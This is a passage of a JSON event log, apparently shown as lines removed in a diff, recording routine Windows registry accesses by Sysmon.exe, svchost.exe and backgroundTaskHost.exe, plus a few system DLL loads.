"{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\EventType", - "registry_value": "EventType", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\EventType", - "registry_value": "EventType", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", 
- "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 
131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692150000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "threadpoolwinrt.dll", - "image_path": "C:\\Windows\\System32\\threadpoolwinrt.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - 
"registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common\\TaskWatchdog", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common\\TaskWatchdog\\ContentDeliveryManager.Background.WatchdogTask", - "registry_value": "ContentDeliveryManager.Background.WatchdogTask", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "Windows.ApplicationModel.Background.TimeBroker.dll", - "image_path": "C:\\Windows\\System32\\Windows.ApplicationModel.Background.TimeBroker.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{8bc39637-a766-42a2-9fda-9233ca603049}", - "registry_value": "{8bc39637-a766-42a2-9fda-9233ca603049}", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{9d5ff1f4-87b5-45eb-b329-50153c699baf}", - "registry_value": "{9d5ff1f4-87b5-45eb-b329-50153c699baf}", - 